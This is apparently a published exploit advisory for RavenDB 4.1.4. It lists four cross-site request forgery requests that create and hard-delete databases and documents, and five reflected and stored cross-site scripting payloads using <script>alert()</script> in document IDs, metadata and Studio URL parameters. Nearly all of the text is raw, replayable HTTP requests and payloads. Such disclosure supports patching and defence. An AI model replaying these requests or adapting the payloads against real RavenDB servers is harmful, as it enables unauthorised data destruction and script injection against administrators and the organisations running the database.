RavenDB version 4.1.4 suffers from cross site request forgery and cross site scripting vulnerabilities.
92d1fad4ba57e86c41e036f720e877e0##################################################################################################################################
# Exploit Title: RavenDB 4.1.4 | Multiple Vulnerabilities
# Date: 25.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://ravendb.net
# Software Link: https://ravendb.net/download
# Version: 4.1.4
##################################################################################################################################
Introduction
Hibernating Rhinos, a global provider of database infrastructure solutions,
empowers Fortune 500 companies and enterprises across the globe to process
online transactions through an open source platform. RavenDB is the
industryas first fully-transactional, NoSQL ACID database that combines
scalability, high-availability, speed and performance. The company produces
two ORM tools, NHibernate and Entity Framework Profilers, that inspect,
analyze and suggest improvements to database access patterns in
applications. Hibernating Rhinos is headquartered in Hadera, Israel with
offices in the U.S. and Poland and extends its reach through over 1500+
customers worldwide.
#################################################################################
Vulnerabilities: CSRF | XSS Reflected & Stored
#################################################################################
CSRF details:
#################################################################################
CSRF1
Create Database
PUT /admin/databases?name=testdb&replicationFactor=1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 120
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"DatabaseName":"testdb","Settings":{},"Disabled":false,"Encrypted":false,"Topology":{"DynamicNodesDistribution":false}}
#################################################################################
CSRF2
Delete Database
DELETE /admin/databases HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"HardDelete":true,"DatabaseNames":["testdb"]}
#################################################################################
CSRF3
Create Document
POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":null,"@id":"testdoc"}},"Id":"testdoc","Type":"PUT"}]}
#################################################################################
CSRF4
Delete Document
DELETE /databases/testdb/studio/collections/docs?name=%40all_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"ExcludeIds":[]}
#################################################################################
XSS details:
#################################################################################
XSS1
Create Document
POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 170
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":"<script>alert(1)<","@id":"<script>alert(1)</script>"}},"Id":"<script>alert(1)</script>","Type":"PUT"}]}
#################################################################################
XSS2
Delete Document
POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 85
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302
{"Commands":[{"Id":"<script>alert(1)</script>","Type":"DELETE","ChangeVector":null}]}
#################################################################################
XSS3
URL
http://127.0.0.1:8080/studio/index.html#databases/documents?&database=testdb%3Cscript%3Ealert(2)%3C/script%3E
METHOD
Get
PARAMETER
database
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS4
URL
http://127.0.0.1:8080/studio/index.html#databases/edit?&database=testdb&id=testdoc%3Cscript%3Ealert(3)%3C/script%3E
METHOD
Get
PARAMETER
id
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS5
URL
http://127.0.0.1:8080/studio/index.html#databases/status/storage/report?&database=testdb%3Cscript%3Ealert(4)%3C/script%3E
METHOD
Get
PARAMETER
database
PAYLOAD
<script>alert(4)</script>
#################################################################################